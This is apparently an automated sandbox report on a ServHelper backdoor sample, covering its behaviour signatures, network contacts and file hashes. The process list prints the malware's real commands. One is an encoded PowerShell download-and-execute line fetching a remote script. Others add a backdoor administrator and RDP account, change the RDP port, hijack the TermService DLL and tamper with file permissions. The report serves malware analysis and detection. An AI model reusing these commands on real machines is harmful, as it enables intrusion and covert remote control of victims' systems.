Malware Analysis Report

2024-10-19 04:37

Sample ID 210924-xryqjahfh7
Target 5367615a3d3f95eeab592a53716ed3bb.exe
SHA256 af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0

Threat Level: Known bad

The file 5367615a3d3f95eeab592a53716ed3bb.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Blocklisted process makes network request

UPX packed file

Possible privilege escalation attempt

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Modifies data under HKEY_USERS

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-24 19:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 19:05

Reported

2021-09-24 19:10

Platform

win7-en-20210920

Max time kernel

138s

Max time network

39s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRQGBH1KYAJHSYPWW58T.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0e0008677b1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 556 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB87.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEB86.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc OLe9MZ8B /add

C:\Windows\system32\net.exe

net.exe user wgautilacc OLe9MZ8B /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc OLe9MZ8B /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc OLe9MZ8B

C:\Windows\system32\net.exe

net.exe user wgautilacc OLe9MZ8B

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc OLe9MZ8B

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

memory/1756-54-0x0000000041900000-0x0000000041CFF000-memory.dmp

memory/1756-58-0x0000000041486000-0x0000000041487000-memory.dmp

memory/1756-57-0x0000000041484000-0x0000000041486000-memory.dmp

memory/1756-56-0x0000000041482000-0x0000000041484000-memory.dmp

memory/1756-59-0x0000000041487000-0x0000000041488000-memory.dmp

memory/952-60-0x0000000000000000-mapping.dmp

memory/952-61-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

memory/952-62-0x000007FEEB3B0000-0x000007FEEBF0D000-memory.dmp

memory/952-63-0x0000000002640000-0x0000000002642000-memory.dmp

memory/952-65-0x0000000002644000-0x0000000002647000-memory.dmp

memory/952-64-0x0000000002642000-0x0000000002644000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/856-67-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\kc8kvr8p.cmdline

MD5 37d6e0a043f15f4b8cea2b3f476f8034
SHA1 e66c4cc52abce51619d85d5e55f94d66330cbd1f
SHA256 d54d9ab4d61a4bb439c81b568d61a7089121b8880aff53bbbb1b23c319794ef8
SHA512 8e923dda15a7c98b6aff96ce65cb1c912eb8ae03e1059647c8d7334bc90e6a3b7980b48a467b148f00c158bf5dee5b2cb6355a8c18d48c3e1e83d5c756d94323

\??\c:\Users\Admin\AppData\Local\Temp\kc8kvr8p.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/540-70-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCEB86.tmp

MD5 26dec704e8c5158fafde77c6a5fa9f21
SHA1 fb5a976d97336e074e7117a9d1cf2fbe09f555da
SHA256 b8fa5a80fa261e3ba83972adcff6823925280cd046817c47a49a09662e5ac685
SHA512 02b6dff4d11c79f42304d637dd1bab0c94798f5361190444c8163969d1b780de570dce5357a8ec64b17a3bc766e3d03fd52e6b8c9709c203b70d52a982598f93

C:\Users\Admin\AppData\Local\Temp\RESEB87.tmp

MD5 e2e1064d59e740f85c31ae1fa71225f4
SHA1 ea173ef135dfd7285a88e56169370f8b78eb11a0
SHA256 c02e840125d279f892a1375514621bdc6c50d388bc1e65987feb0519177f5a07
SHA512 0f2e2e189820a6ffeb11f703ecf0bfa440c7831f0efb3eb182983b6818198ae162196fdc33cebc3c0bf6c8f3b44248c0fbe35873bb35b441d81e518cb2a05567

C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.dll

MD5 eaa955de0a4cb151ebdb9fb472e1833c
SHA1 4ed864910c9886b661096523e6abb91f5064a803
SHA256 e67721bc91c776035fb0ced875d9c94a16b47d4d2d0d3d57aec203710f079aba
SHA512 af953a7c5aa0e6c1f9081e8f8ef586d064141cb0b2d2d739d4c73168e7a509a983af4b7aa06c933f74d3071a68b0b14a7046d3da204d3f912466332ed2a67bd4

C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.pdb

MD5 a693d8eb536e69436a6d016c5ae21538
SHA1 6c49b9c08763c975dc6c815ce1e629a86b33dc03
SHA256 d695e4ebb2f1db68776840f0321feb6122cad45f59b6be5a1ae65df816142cfd
SHA512 ec3375bdffbcb839e716cf0bd790654db6391f11fff1ff1a405449ee9a5477f12bb613c87592b02e9408af39fb61f9f0e4d30578ce2cbeffba4949eab5c66acb

memory/952-75-0x000000000264B000-0x000000000266A000-memory.dmp

memory/856-76-0x0000000002130000-0x0000000002132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

memory/952-78-0x000000000266D000-0x000000000266E000-memory.dmp

memory/1808-79-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bb5af8bc520a0de48105fc923b6a1d84
SHA1 0809d53f50f67e47933b5075c45d95228fdf828c
SHA256 5fc188ee52b3efa71cd4385e987ce5ffd62b4e0b0e6ab3e389c2e7bc1d9a5ab3
SHA512 fb02e2d24d52b48487426556700c74cf4782aac50b01c8316733e82f9450c6cc0fd722f59e958fa4ac992d05a332722d52319628242949386eb59f7ee544984a

memory/1808-82-0x000007FEEB3B0000-0x000007FEEBF0D000-memory.dmp

memory/1808-83-0x0000000002760000-0x0000000002762000-memory.dmp

memory/1808-85-0x0000000002764000-0x0000000002767000-memory.dmp

memory/1808-86-0x0000000002767000-0x0000000002768000-memory.dmp

memory/1808-84-0x0000000002762000-0x0000000002764000-memory.dmp

